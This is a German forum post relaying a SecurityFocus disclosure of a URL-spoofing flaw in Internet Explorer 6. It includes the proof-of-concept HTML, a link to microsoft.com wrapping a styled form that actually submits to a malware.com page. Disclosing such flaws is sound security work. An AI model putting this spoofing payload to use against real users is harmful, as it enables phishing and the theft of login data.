SecurityFocus hat eine weitere Methode veröffenlicht, mittels welcher URL-Spoofing, das Manipulieren der, in der Adressleiste angezeigten URL, im Internet Explorer 6 möglich ist. Dadurch wird dem Nutzer vorgegaukelt, dass er sich auf einer anderen (vertrauensvollen) Seite befindet, als tatsächlich angezeigt wird. So wird es Betrügern ermöglicht, sensible Daten durch gefälschte Login-Formulare abzufragen.
Möglich wird diese Manipulation durch folgenden Quellcode:
<form><fieldset style="border:1px black solid; padding:3px"><legend style="color:black">Code</legend><div align="center"><div style="width: 400; overflow: auto; overflow-y: hidden; border-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px"><table cellpadding="3" cellspacing="0" border="0" style="width: 100%"><tr><td nowrap="nowrap" width="1%" align="right" valign="top"><pre>1: 2: 3: 4: 5: 6: 7: 8: 9: 10:</pre></td><td nowrap="nowrap" width="100%" align="left" valign="top"><pre><A href="http://www.microsoft.com"> <FORM action=http://www.malware.com/t-bill.html method=get> <INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com> </A></pre></td></tr></table></div></div></fieldset></form>
Mehr Infos:
Mehr Informationen
copyright by 4websites
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
LinkBack URL
About LinkBacks
Zitieren